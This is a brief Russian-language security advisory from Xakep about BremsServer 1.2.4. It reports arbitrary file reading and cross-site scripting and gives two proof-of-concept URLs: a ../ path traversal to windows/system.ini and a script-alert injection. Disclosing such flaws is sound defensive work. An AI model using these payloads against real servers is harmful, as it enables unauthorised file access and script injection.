Межсайтовый скриптинг и просмотр произвольных файлов в BremsServer

Рекомендуем почитать:

Xakep #299. Sysmon

Содержание выпуска
Подписка на «Хакер»-60%

Программа: BremsServer 1.2.4

Уязвимость обнаружена в BremsServer. Удаленный пользователь может просматривать файлы на системе. Удаленный пользователь может также выполнить XSS нападение.

1. http://[target]/../PATH/windows/system.ini

2. http://[target]/<script>alert("Test")</script>

Межсайтовый скриптинг и просмотр произвольных файлов в BremsServer

Xakep #299. Sysmon

Подпишись на наc в Telegram!

Из рубрики «Взлом»

Охлади себе всё. Собираем контроллер оборотов для компьютерных кулеров

MEGANews. Самые важные события в мире инфосека за апрель

HTB Devvortex. Повышаем привилегии через уязвимость в Apport

Уроки форензики. Анализируем логи Windows и таблицу MFT на примере HTB Jinkies

Трюки

Липовый соникс. Реверсим картридж Liposonix и пишем его эмулятор

Новая диета для Linux. Загружаем современный Linux, используя минимум памяти

Фишинг в соцсетях. Как социальные сети помогают хакерам

Сделай мне красиво! Изобретаем персональный нейросетевой фотоувеличитель

Последние новости

Атака Dirty Stream угрожает множеству приложений для Android

Группировка Muddling Meerkat использует «Великий китайский файрвол» для своих атак

Участник REvil получил почти 14 лет тюрьмы в США

Microsoft не собирается исправлять проблему 0x80070643 в Windows

Google предлагает до 450 000 долларов за уязвимости в некоторых Android-приложениях